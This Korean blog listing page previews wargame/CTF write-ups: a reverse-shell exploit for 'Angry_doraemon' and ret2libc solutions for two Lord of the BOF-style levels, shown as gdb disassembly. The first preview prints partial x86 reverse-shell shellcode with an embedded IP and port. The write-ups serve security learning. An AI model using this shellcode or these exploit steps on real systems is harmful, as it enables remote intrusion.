본문 바로가기

Angry_doraemon 기존의 내가 작성한 exploit으로 시도하니 공격되지 않았다.이유는 다음과 같다. 1.열린 포트가 문제포트 말곤 없다. - 바인드, 리버스쉘 둘다 작동안함.2.recv의 버퍼를 너무 작게주어서, 이상한 값이 릭되었다. *참고로 문제 푸는도중 여러 리버스쉘을 써봣지만, 스택으로 점프하는 놈도 있어서 잘되지 않았고, 메타스프로잇의 리버스쉘도 잘 되지 않았다. 아래가 잘 동작한 리모트 쉘이다."\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80""\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68""\xcb\xfa\x4d\xbb" #ip "\x68\x02\x00""\x22\xb8" #port"\x89\xe1\xb0\x66\x50\.. 더보기
cobolt to goblin 1.ret2libc[cobolt@localhost cobolt]$ gdb -q goblin(gdb) set disassembly-flavor intel(gdb) disas mainDump of assembler code for function main:0x80483f8 : push %ebp0x80483f9 : mov %ebp,%esp0x80483fb : sub %esp,160x80483fe : lea %eax,[%ebp-16]0x8048401 : push %eax0x8048402 : call 0x804830c 0x8048407 : add %esp,40x804840a : lea %eax,[%ebp-16]0x804840d : push %eax0x804840e : push 0x80484700x8048413 :.. 더보기
gremlin to cobolt 1.ret2libc[gremlin@localhost gremlin]$ gdb -q cobolt(gdb) set disassembly-flavor intel(gdb) disas mainDump of assembler code for function main:0x8048430 : push %ebp0x8048431 : mov %ebp,%esp0x8048433 : sub %esp,160x8048436 : cmp DWORD PTR [%ebp+8],10x804843a : jg 0x8048453 0x804843c : push 0x80484d00x8048441 : call 0x8048350 0x8048446 : add %esp,40x8048449 : push 00x804844b : call 0x8048360 0x804.. 더보기